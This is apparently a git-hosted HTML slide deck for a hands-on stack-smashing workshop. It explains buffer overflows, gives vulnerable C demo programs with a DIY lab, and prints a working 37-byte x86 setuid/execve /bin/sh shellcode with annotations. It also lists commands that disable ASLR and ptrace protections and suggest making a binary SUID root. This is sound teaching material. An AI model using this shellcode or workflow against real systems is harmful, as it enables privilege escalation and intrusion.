smash-talk/index.html

607 lines
16 KiB
HTML
Raw Normal View History

2020-01-16 08:42:45 +01:00
<!DOCTYPE html>
<html>
<head>
<title>Old skool stack smashing</title>
<meta charset="utf-8">
<style>
@import url(https://fonts.googleapis.com/css?family=Droid+Serif);
@import url(https://fonts.googleapis.com/css?family=Yanone+Kaffeesatz);
@import url(https://fonts.googleapis.com/css?family=Ubuntu+Mono:400,700,400italic);
body {
font-family: 'Droid Serif';
}
h1, h2, h3 {
font-family: 'Yanone Kaffeesatz';
font-weight: 400;
margin-bottom: 0;
}
.remark-slide-content h1 { font-size: 3em; }
.remark-slide-content h2 { font-size: 2em; }
.remark-slide-content h3 { font-size: 1.6em; }
.footnote {
position: absolute;
bottom: 3em;
font-size: 0.7em;
}
li p { line-height: 1.25em; }
.red { color: #fa0000; }
.large { font-size: 2em; }
a, a > code {
color: rgb(249, 38, 114);
text-decoration: none;
}
code {
background: #e7e8e2;
border-radius: 5px;
}
.remark-code, .remark-inline-code { font-family: 'Ubuntu Mono'; }
.remark-code-line-highlighted { background-color: #373832; }
.pull-left {
float: left;
width: 47%;
}
.pull-right {
float: right;
width: 47%;
}
.pull-right ~ p {
clear: both;
}
#slideshow .slide .content code {
font-size: 0.8em;
}
#slideshow .slide .content pre code {
font-size: 0.9em;
padding: 15px;
}
.inverse {
background: #272822;
color: #777872;
text-shadow: 0 0 20px #333;
}
.inverse h1, .inverse h2 {
color: #f3f3f3;
line-height: 0.8em;
}
/* Slide-specific styling */
#slide-inverse .footnote {
bottom: 12px;
left: 20px;
}
#slide-how .slides {
font-size: 0.9em;
position: absolute;
top: 151px;
right: 140px;
}
#slide-how .slides h3 {
margin-top: 0.2em;
}
#slide-how .slides .first, #slide-how .slides .second {
padding: 1px 20px;
height: 90px;
width: 120px;
-moz-box-shadow: 0 0 10px #777;
-webkit-box-shadow: 0 0 10px #777;
box-shadow: 0 0 10px #777;
}
#slide-how .slides .first {
background: #fff;
position: absolute;
top: 20%;
left: 20%;
z-index: 1;
}
#slide-how .slides .second {
position: relative;
background: #fff;
z-index: 0;
}
/* Two-column layout */
.left-column {
color: #777;
width: 20%;
height: 92%;
float: left;
}
.left-column h2:last-of-type, .left-column h3:last-child {
color: #000;
}
.right-column {
width: 75%;
float: right;
padding-top: 1em;
}
</style>
</head>
<body>
<textarea id="source">
name: inverse
layout: true
class: center, middle, inverse
---
# Old skool stack smashing
Ward Wouts<br>
https://wizeazz.nl/smash/
---
# Agenda
1. Introduction
1. What is a stack?
1. How does this work?
1. Vulnerable fuctions
1. Now what can we do with this?
1. Shellcode?
1. Endianness?
1. Demo
1. DIY
1. Quick Radare2 reference
---
# Introduction
---
layout: false
.left-column[
## Introduction
]
.right-column[
2020-01-16 15:05:49 +01:00
C is full of holes, let's get to know one.
2020-01-16 08:42:45 +01:00
2020-01-16 15:05:49 +01:00
Old skool, so no OS or hardware protections. Which today is mostly relevant in IoT. (Remember, the `S` in `IoT` stands for Security.)
2023-02-14 09:33:01 +01:00
Stack smashing is making use of a buffer overflow vulnerability in code using variables on the stack. This type of vulnerability has been known for a long time. This attack was first properly documented in Phrack #49.
2020-01-16 15:05:49 +01:00
.footnote[Phrack #49(http://www.phrack.org/issues/49/14.html#article)]
2020-01-16 08:42:45 +01:00
]
---
template: inverse
# What is a stack?
---
.left-column[
## What is a stack?
]
.right-column[
Stacks in computing architectures are regions of memory where data is added or removed in a last-in-first-out (LIFO) manner.
The stack is used to pass arguments between functions, to allocate space for fixed variables, and to remember how to get back out of the current function.
For x86 systems the stack grows from the largest memory address up.
.footnote[Borrowed from [wikipedia](https://en.wikipedia.org/wiki/Stack-based_memory_allocation)]
]
---
2020-01-16 15:05:49 +01:00
.left-column[
## Say wut?
]
.right-column[
Whenever a function is called a frame is added to the stack. Whenever a function ends the frame is deleted.
Such a frame consists of variables, a stored stack pointer and a return address.
]
---
.left-column[
## This is not helping you know...
]
.right-column.center.middle[
<img src="Stack.png" width="100%" />
]
---
2020-01-16 08:42:45 +01:00
template: inverse
# How does this work?
---
.left-column[
## How does this work?
]
.right-column[
## Start with some code:
``` C
#include <string.h>
void foo (char *bar)
{
char c[12];
strcpy(c, bar); // no bounds checking
}
int main (int argc, char **argv)
{
foo(argv[1]);
return 0;
}
```
.footnote[Borrowed from [wikipedia](https://en.wikipedia.org/wiki/Stack_buffer_overflow)]
]
---
.left-column[
## How does this work?
]
.right-column.center.middle[
<img src="Stack_Overflow_2.png" width="70%" />
.footnote[Borrowed from [wikipedia](https://en.wikipedia.org/wiki/Stack_buffer_overflow)]
]
---
.left-column[
## How does this work?
]
.right-column.center.middle[
<img src="Stack_Overflow_3.png" width="70%" />
.footnote[Borrowed from [wikipedia](https://en.wikipedia.org/wiki/Stack_buffer_overflow)]
]
---
.left-column[
## How does this work?
]
.right-column.center.middle[
<img src="Stack_Overflow_4.png" width="85%" />
.footnote[Borrowed from [wikipedia](https://en.wikipedia.org/wiki/Stack_buffer_overflow)]
]
---
template: inverse
# Vulnerable functions
---
.left-column[
## Vulnerable functions
]
.right-column[
Anything that doesn't take buffer sizes into account. The big ones being:
- gets
- strcpy
- sprintf
]
---
template: inverse
# Now what can we do with this?
---
.left-column[
## Now what can we do with this?
]
.right-column[
We can change the flow through the program:
- Jump to a different function in a known spot in memory
- Jump to our own shellcode somewhere in the buffer (can also write past the return address)
- Jump to our own shellcode in the environment
*Full nerd: By overwriting the return address we can change to which instructions the Instruction Pointer (`EIP` in 32-bit x86, `RIP` in 64-bit x86) points. `EIP` and `RIP` are so called registers. There are more, like `EBP`/`RBP` which is used for pointing at the stack frame pointer. The other registers are used like variables.*
.footnote[Lots of shellcode [here](http://shell-storm.org/shellcode/)]
]
---
template: inverse
# Shellcode?
---
.left-column[
## Shellcode?
]
.right-column[
In hacking, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode. [1]
2023-02-14 17:16:51 +01:00
Here's a bit of shellcode to open `/bin/sh` on 32-bit x86 (37 bytes) [2]:
2020-01-16 08:42:45 +01:00
```
2023-02-14 17:16:51 +01:00
\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2
\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89
\xe3\x52\x53\x89\xe1\xcd\x80
2020-01-16 08:42:45 +01:00
```
As strings in C are NULL terminated, shellcode should not have `\x00` in it.
`\x90` is a NOP (No Operand) in x86. You can use a bunch of those in front of shellcode to increase the chances of ending up in your shellcode. This is called a NOP-sled.
Sometimes swapping out some shellcode for some other shellcode is the trick.
2023-02-14 17:16:51 +01:00
.footnote[[1] Borrowed from [wikipedia](https://en.wikipedia.org/wiki/Shellcode)<br>[2] Shellcode from [shell-storm](http://shell-storm.org/shellcode/files/shellcode-251.php)]
2020-01-16 08:42:45 +01:00
]
---
template: inverse
# Endianness?
---
.left-column[
## Endianness?
]
.right-column[
In computing, endianness refers to the order of bytes (or sometimes bits) within a binary representation of a number. It can also be used more generally to refer to the internal ordering of any representation, such as the digits in a numeral system or the sections of a date.
In its most common usage, endianness indicates the ordering of bytes within a multi-byte number. A **big-endian** ordering places the most significant byte first and the least significant byte last, while a **little-endian** ordering does the opposite. For example, consider the unsigned hexadecimal number 0x1234, which requires at least two bytes to represent. In a big-endian ordering they would be `[ 0x12, 0x34 ]`, while in a little-endian ordering, the bytes would be arranged `[ 0x34, 0x12 ]`.
x86 is a **little-endian** architecture
]
---
template: inverse
2023-02-15 11:09:42 +01:00
# Exploitation workflow
---
.left-column[
## Exploitation workflow
]
.right-column[
- Find input to overflow
- Figure out exact needed length for overflow to overwrite return address
- Place shellcode in memory, ideally with a NOP-sled in front
- Figure out shellcode location
- Use overflow to point the return address at shellcode/NOP-sled
- Do take endianness into account
]
---
template: inverse
2020-01-16 08:42:45 +01:00
# Demo
---
.left-column[
## Demo
]
.right-column[
This is the code for the binary:
``` C
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(int argc, char * argv[]){
char buf[128];
if(argc == 1){
printf("Usage: %s argument\n", argv[0]);
exit(1);
}
strcpy(buf,argv[1]);
printf("%s", buf);
return 0;
}
```
Binary here: https://wizeazz.nl/smash/code/demo
.footnote[Borrowed from [Overthewire.org](https://overthewire.org/wargames/narnia/)]
]
---
template: inverse
2023-02-14 09:33:01 +01:00
# Protections
---
.left-column[
## Protections
]
.right-column[
- Stack canaries<br>
Place a value before the return address and check if it's been changed before returning from a function.
- Nonexecutable stack<br>
W^X (write or execute) won't execute code on the stack (but will still follow return addresses).
- Randomization<br>
Change function and stack addresses around so whenever a program is executed the locations are different.
All these can be worked around given the right conditions. They just make things annoying, euh, harder.
]
---
template: inverse
2020-01-16 08:42:45 +01:00
# DIY
---
.left-column[
## DIY
]
.right-column[
Now it's your turn.
2023-02-14 17:16:51 +01:00
Log into the provided VM. Binary and shellcode are in `/smash`
2020-01-16 08:42:45 +01:00
**Alternative** If you want to use your own system, Do this as preparation:
- Install radare2: `$ sudo apt-get install -y radare2`<br>**OR**<br> `$ git clone https://github.com/radareorg/radare2.git && cd radare2 && sys/user.sh`<br>for a persistent installation.
- Turn off ASLR: `$ sudo sh -c "echo 0 > /proc/sys/kernel/randomize_va_space"`
- Check: `$ sysctl -a --pattern randomize`
- Enable debugging: `sudo sh -c "echo 0 > /proc/sys/kernel/yama/ptrace_scope"`
- Download binary:<br> `$ curl -O https://wizeazz.nl/smash/code/diy`
- Make executable: `$ chmod a+x diy`
.footnote[Linux and ASLR settings [here](https://linux-audit.com/linux-aslr-and-kernelrandomize_va_space-setting/)]
]
---
.left-column[
## DIY
]
.right-column[
Assignment:
- Make the binary print `You win`.
This is the code for the binary:
``` C
#include <stdio.h>
#include <strings.h>
void winner()
{
printf("You win\n");
}
void whoareyou()
{
char name[250];
printf("What's your name? ");
gets(name);
printf("\nHello, %s\n", name);
}
int main()
{
whoareyou();
printf("You lose\n");
}
```
]
---
.left-column[
## DIY
]
.right-column[
Now, if you managed that:
- Try to make it open a shell via shellcode. Especially fun if you make the binary SUID root:<br> `$ sudo chown root.root diy && sudo chmod u+s diy`
2023-02-14 17:16:51 +01:00
- Can be done both via shellcode in an environment variable (usually more reliable **HINT**) and via shellcode in the buffer
2020-01-16 08:42:45 +01:00
Tip: `gets()` behaves weirdly and will close your shell immediately. The trick is to do something like:<br>
`$ (echo -e MYINPUT; cat)|./diy`<br>
This won't give you a prompt!
]
---
template: inverse
# Quick Radare2 reference
---
.left-column[
## Quick Radare2 reference
]
.right-column[
- `r2 -Ad <program>` start radare2 in debugger mode and analyse program
- `afl` list functions
- `pdf@<function>` disassemble function (e.g. `pdf@main`)
- `pxw @<location>` print memory (e.g. `pxw @ebp`)
- `db <address>` Set breakpoint
- `dc` continue to breakpoint
- `ds` step into
- `V` go to visual mode
- `q` leave visual mode
- `p` next view (2x for debugger view)
- `s` step into
- `S` step over
- `?v HEX` build in calculator (e.g. `?v 0xdead0000+0xbeef`)
- `?vi HEX` hex to integer (e.g. `?vi 0x400`)
2023-02-14 17:16:51 +01:00
]
---
template: inverse
# Quick GDB reference
---
.left-column[
## Quick GDB reference
]
.right-column[
- `gdb --args <program> <arguments>` start gdb with a program with arguments
- `disas <function>` disassemble a function
- `b *<address>` set a breakpoint on an address
- `x/200x $esp` show the memory contents for 200 bytes starting at the address $esp points to
2023-02-15 08:57:22 +01:00
- `x/200c <addr>` show the memory contents for 200 characters starting at the address
2023-02-14 17:16:51 +01:00
- `r` run
- `r < foo.txt` run with stdin filled from a file
- `c` continue
- `s` step into
- `info functions` list all functions
2023-02-15 08:57:22 +01:00
- `p (char*)getenv("PATH")` find the memory location of an environment variable for the running program (use a breakpoint!)
Many improvements exist to make gdb nicer for reverse engineering, such as:
- https://github.com/pwndbg/pwndbg
- https://github.com/hugsy/gef
- https://github.com/longld/peda
2020-01-16 08:42:45 +01:00
]
2023-02-15 12:04:05 +01:00
---
template: inverse
# Shellcode explained
---
.left-column[
## Shellcode explained
]
.right-column[
Shellcode from: http://shell-storm.org/shellcode/files/shellcode-251.html
```
/*
* (Linux/x86) setuid(0) + setgid(0) + execve("/bin/sh", ["/bin/sh", NULL])
* - 37 bytes - xgc@gotfault.net
*/
"\x6a\x17" // push $0x17
"\x58" // pop %eax
"\x31\xdb" // xor %ebx, %ebx
"\xcd\x80" // int $0x80
"\x6a\x2e" // push $0x2e
"\x58" // pop %eax
"\x53" // push %ebx
"\xcd\x80" // int $0x80
"\x31\xd2" // xor %edx, %edx
"\x6a\x0b" // push $0xb
"\x58" // pop %eax
"\x52" // push %edx
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp, %ebx
"\x52" // push %edx
"\x53" // push %ebx
"\x89\xe1" // mov %esp, %ecx
"\xcd\x80" // int $0x80
```
]
---
.left-column[
## Shellcode explained
]
.right-column[
```
"\x6a\x17" // push $0x17
"\x58" // pop %eax
"\x31\xdb" // xor %ebx, %ebx
"\xcd\x80" // int $0x80
```
`int 0x80` is a legacy way of doing a syscall to the kernel. See also:
http://www.linfo.org/int_0x80.html As this is a 32-bit program, the list of syscalls can be found here: `/usr/include/asm/unistd_32.h` Which shows the values in decimal: 0x17 = 23 = setuid.
So, whats done here is put 0x17 in EAX, and make EBX (the argument for setgid, see https://faculty.nps.edu/cseagle/assembly/sys_call.html) 0 using a XOR. Then call int 0x80. Resulting in a `setuid 0`.
]
---
.left-column[
## Shellcode explained
]
.right-column[
```
"\x6a\x2e" // push $0x2e
"\x58" // pop %eax
"\x53" // push %ebx
"\xcd\x80" // int $0x80
```
Pretty much the same as last snippet, but for 0x2e = 46 = setgid.
]
---
.left-column[
## Shellcode explained
]
.right-column[
```
"\x31\xd2" // xor %edx, %edx
"\x6a\x0b" // push $0xb
"\x58" // pop %eax
"\x52" // push %edx
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp, %ebx
"\x52" // push %edx
"\x53" // push %ebx
"\x89\xe1" // mov %esp, %ecx
"\xcd\x80" // int $0x80
```
Another `int 0x80` here for syscall 0xb = 11 = execve. 0x68732f2f in ASCII chars = `hs//`, but little endian, so read `//sh`. Same for 0x6e69622f, which gets `/bin`. Together this makes for `/bin//sh`. That double `/` is here to make things align on 32-bit words.
The arguments for execve will not fit in registers, as they're variable size, so EBX gets a pointer to the string.
]
2020-01-16 08:42:45 +01:00
</textarea>
<script src="https://remarkjs.com/downloads/remark-latest.min.js">
</script>
<script>
var slideshow = remark.create();
</script>
</body>
</html>